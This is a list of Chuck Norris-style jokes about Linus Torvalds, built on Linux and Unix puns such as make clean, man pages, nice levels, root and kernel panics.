Linus doesn't push the flush toilet button. He simply says "make clean".
Linus Torvalds has no dependencies.
Linus Torvalds takes one look at your desktop and knows which porn sites you visited. In the last ten years.
Linus can enrich himself simply by chowning your bank account. He does not do this because there is no challenge in it.
There are no man pages for Linus Torvalds, only god pages.
Linus Torvalds can do an infinite loop in five seconds... in his head.
Linus Torvalds doesn't wear glasses anymore not because he had laser eye surgery, but because he finally got his xorg.conf properly configured in his head.
Linus Torvalds can use a nice level lower than -20.
Linus Torvalds doesn't need to mount his drives.
Linus Torvalds doesn't debug.
Linus Torvalds can install Linux on a dead badger.
Linus Torvalds doesn't need backups. He just uploads his files and lets the world mirror them.
Linus Torvalds is taking over the world. Microsoft is just a diversion so that no one would suspect a mild mannered Finnish programmer.
Linus Torvalds already has Linux 3.0. He is just keeping it to himself to build suspense.
Linus Torvalds didn't design Linux to run on the 386. Intel designed the 386 to run Linux.
People pray to Jesus, but Jesus prays to Linus Torvalds.
Linus need not worry about Microsoft patent crap, he simply do `sudo mv /tmp/ms /dev/null`.
Linus Torvalds is more powerful than root.
If you could read Linus Torvald’s mind, you'd find that his stream of conciousness is entirely in binary.
Linus scared A and B away, so they had to make C.
Linus only has 2 buttons on his keyboard '1' and '0'
Linus’s kernel never panics.